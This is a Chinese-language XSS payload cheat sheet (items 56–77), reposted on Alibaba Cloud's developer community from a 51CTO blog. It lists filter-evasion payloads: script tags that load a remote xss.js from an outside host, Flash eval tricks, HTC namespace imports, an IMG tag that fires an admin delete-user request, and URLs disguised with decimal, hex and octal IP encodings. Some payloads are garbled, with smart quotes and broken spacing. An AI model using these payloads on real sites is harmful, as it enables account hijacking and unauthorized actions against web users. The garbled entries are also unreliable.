xss跨站脚本攻击汇总[2]-阿里云开发者社区

xss跨站脚本攻击汇总[2]

2017-11-16 1036

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介：

(56)在flash中使用ActionScrpt可以混进你XSS的代码
a=”get”;
b=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);

(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
<HTML xmlns:xss>
<?import namespace=”xss” implementation=” http://3w.org/XSS/xss.htc ”>
<xss:xss>XSS</xss:xss>
</HTML>

(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<SCRIPT SRC=””></SCRIPT>

(59)IMG嵌入式命令,可执行任意命令
<IMG SRC=” http://www.XXX.com/a.php?a=b ”>

(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤
<SCRIPT a=”>” SRC=” http://3w.org/xss.js ”></SCRIPT>

(62)
<SCRIPT =”>” SRC=” http://3w.org/xss.js ”></SCRIPT>

(63)
<SCRIPT a=”>” ” SRC=” http://3w.org/xss.js ”></SCRIPT>

(64)
<SCRIPT “a=’>’” SRC=” http://3w.org/xss.js ”></SCRIPT>

(65)
<SCRIPT a=`>` SRC=” http://3w.org/xss.js ”></SCRIPT>

(66)
<SCRIPT a=”>’>” SRC=” http://3w.org/xss.js ”></SCRIPT>

(67)
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=” http://3w.org/xss.js ”></SCRIPT>

(68)URL绕行
<A HREF=” http://127.0.0.1/ ”>XSS</A>

(69)URL编码
<A HREF=” http://3w.org ”>XSS</A>

(70)IP十进制
<A HREF=”http://3232235521″>XSS</A>

(71)IP十六进制
<A HREF=” http://0xc0.0xa8.0 ×00.0×01″>XSS</A>

(72)IP八进制
<A HREF=” http://0300.0250.0000.0001 ″>XSS</A>

(73)混合编码
<A HREF=”h
tt p://6 6.000146.0×7.147/”">XSS</A>

(74)节省[http:]
<A HREF=”//www.google.com/”>XSS</A>

(75)节省[www]
<A HREF=” http://google.com/ ”>XSS</A>

(76)绝对点绝对DNS
<A HREF=” http://www.google.com./ ”>XSS</A>

(77)javascript链接

本文转hackfreer51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/507919，如需转载请自行联系原作者

xss跨站脚本攻击汇总[2]

热门文章

最新文章

相关电子书